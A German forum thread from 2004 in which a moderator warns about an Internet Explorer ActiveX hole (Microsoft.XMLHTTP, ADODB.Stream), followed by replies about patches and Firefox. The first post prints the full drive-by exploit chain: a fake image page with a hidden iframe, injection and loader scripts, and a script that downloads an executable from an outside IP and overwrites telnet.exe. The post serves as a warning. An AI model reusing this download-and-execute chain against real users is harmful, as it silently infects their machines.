Autor |
Nachricht |
[fränK]
Moderator Threadersteller
Dabei seit: 27.04.2002
Ort: -
Alter: -
Geschlecht:
|
Verfasst Sa 12.06.2004 01:58
Titel [IE] Sicherheitslücke ActiveXObjects „Microsoft.XMLHTTP“ ... |
|
|
Tachjen,
sollte euch auch einer damit verarschen wollen:
(mit aktiver Firewall bringt das glücklicherweise
keinen Erfolg)
ACHTUNG!
Nur mit aktiver Firewall testen!
Links sind sicherheitshalber nicht zum anklicken!
Die „Telnet.exe“ sollte man danach durch das
Original ersetzen (bei Betriebssystemen mit
Systemdateienschutz z.B. Windows XP geht das
fast automatisch)
Klickt man auf untenstehenden Link, sieht man
ein tolles Bildchen...(der Link sieht auch nach nur
einem JPG aus).
Im Hintergrund wird die „Telnet.exe“ im Windows-
System32-Verzeichnis überschrieben und ausgeführt.
Das übertragene Programm tarnt sich als „Windows
Messenger“ von Microsoft.
Ermöglicht wird das Ganze durch die ActiveX-Kompo-
nenten „Microsoft.XMLHTTP“ und „ADODB.Stream“.
Hier die verwendeten Dateien:
Der Link zum Übel:
h++p://www.banyantreedesign.com/files/flowsheet.jpg
Code: | <html><body><img src="image.jpg"><iframe src="http://66.119.180.10:8080/starter.htm" height="0" width="0"></body></html> |
h++p://66.119.180.10:8080/starter.htm
Code: | <html>
<body>
<script language="Javascript">
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://66.119.180.10:8080/shellscript_loader.js\\'><\/script>'";
}
</script>
<script language="javascript">
setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.php" WIDTH=200 HEIGHT=200></IFRAME>');
</script>
</body>
</html> |
h++p://66.119.180.10:8080/shellscript_loader.js
Code: | function getRealShell() {
myiframe.document.write("<SCRIPT SRC='http://66.119.180.10:8080/shellscript.js'><\/SCRIPT>");
}
document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100); |
h++p://66.119.180.10:8080/shellscript.js
Code: | var downloadurl="http://66.119.180.10:8080/a.exe";
if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1) savetopath="C:\\WINDOWS\\system32\\telnet.exe";
if(navigator.appVersion.indexOf("Windows NT 5.0")!=-1) savetopath="C:\\WINNT\\system32\\telnet.exe";
payloadURL = downloadurl;
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",payloadURL,0);
x.Send();
function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t" + "r" + "e" + "a" + "m"; }
var s = new ActiveXObject(bla());
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile(savetopath,2);
location.href = "telnet://"; |
Trotzdem noch viel Spaß beim surfen!
|
|
|
|
|
cyanamide
Moderator
Dabei seit: 09.12.2002
Ort: Altkaiserreich Koblenz WW
Alter: 48
Geschlecht:
|
Verfasst Sa 12.06.2004 02:02
Titel
|
|
|
Ist das noch nicht behoben mit den aktuellen Updates?
uiiii
|
|
|
|
|
Anzeige
|
|
|
[fränK]
Moderator Threadersteller
Dabei seit: 27.04.2002
Ort: -
Alter: -
Geschlecht:
|
Verfasst Sa 12.06.2004 02:26
Titel
|
|
|
Mmm, ich habe alle verfügbaren Updates
installiert und es geht trotzdem...
|
|
|
|
|
localhost
Dabei seit: 25.04.2003
Ort: nähe Bielefeld
Alter: 47
Geschlecht:
|
Verfasst Sa 12.06.2004 08:30
Titel
|
|
|
wat will man erwarten von mickysoft? öfter mal wat neues.....der schrott ist einfach toooo bugy
|
|
|
|
|
el Zeratulo
Dabei seit: 04.04.2002
Ort: Bent Badheim
Alter: -
Geschlecht:
|
Verfasst Sa 12.06.2004 09:58
Titel
|
|
|
Nein, wird nicht durch die aktuellen Updates behoben.
Noch schlimmer ist das ein aktuell komplett gepatchtes Windows mit deaktiviertem ActiveX von
http://www.heise.de/newsticker/meldung/48016
Problemlos mit einem Virus infiziert werden kann.
Also schnell den Browser wechseln (falls nicht schon längst geschehen)
FireFox 0.9 is released
http://www.mozilla.org/
(RC1)
Zuletzt bearbeitet von el Zeratulo am Sa 12.06.2004 11:11, insgesamt 1-mal bearbeitet
|
|
|
|
|
red_sista_kathy
Dabei seit: 20.03.2003
Ort: -
Alter: 41
Geschlecht:
|
Verfasst Sa 12.06.2004 11:00
Titel
|
|
|
wieso soll Firefox out sein??????
so'n quaaaaak :-[
mein freund arbeitet in so 'ner computerfreakfirma in der ausnahmslos alle megafreaks sind
und die sich zum großteil darauf spezialisiert haben sicherheitslücken in windows zu testen.
sein chef, der sowieso nur drauf aus ist microsoftlücken zu finden
(was ja leider nicht so schwer ist, wenn ein 17jähriger einen für microsoft "unbezwingbaren" wurm in umlauf bringt)
und diese microsoft vorn latz zu knallen, ist überzeugter FIREFOX USER
von wegen OUT tststssssss
|
|
|
|
|
el Zeratulo
Dabei seit: 04.04.2002
Ort: Bent Badheim
Alter: -
Geschlecht:
|
Verfasst Sa 12.06.2004 11:11
Titel
|
|
|
red_sista_kathy hat geschrieben: | wieso soll Firefox out sein??????
so'n quaaaaak :-[
mein freund arbeitet in so 'ner computerfreakfirma in der ausnahmslos alle megafreaks sind
und die sich zum großteil darauf spezialisiert haben sicherheitslücken in windows zu testen.
sein chef, der sowieso nur drauf aus ist microsoftlücken zu finden
(was ja leider nicht so schwer ist, wenn ein 17jähriger einen für microsoft "unbezwingbaren" wurm in umlauf bringt)
und diese microsoft vorn latz zu knallen, ist überzeugter FIREFOX USER
von wegen OUT tststssssss |
Das war englisch.
Und hieß soviel wie
Firefox 0.9 ist erschienen.
ich werds aber sicherheitshalber jetzt editieren damit nicht mehr leute die zeile falsch interpretieren
|
|
|
|
|
Waschbequen
Account gelöscht
Ort: -
|
Verfasst Sa 12.06.2004 11:40
Titel
|
|
|
@el
Wusste gar nicht, dass XMLhttp auf manchen Windows-Systemen standardmäßig installiert ist. Na ja. Ansonsten ist das Ding imho nämlich das beste und geilste Tool überhaupt in der MS-Scriptingwelt. Kann man tolle Sachen mit anstellen - leider halt auch sowas
|
|
|
|
|
|
|
|
Ähnliche Themen |
PHP kritische Sicherheitslücke
Wieder neue Sicherheitslücke im Internet Explorer
microsoft silverlight
Microsoft Access Datenbank
Microsoft Office v. X auf 2 Rechnern?
microsoft silverlight, konkurrenz zu flash?
|
|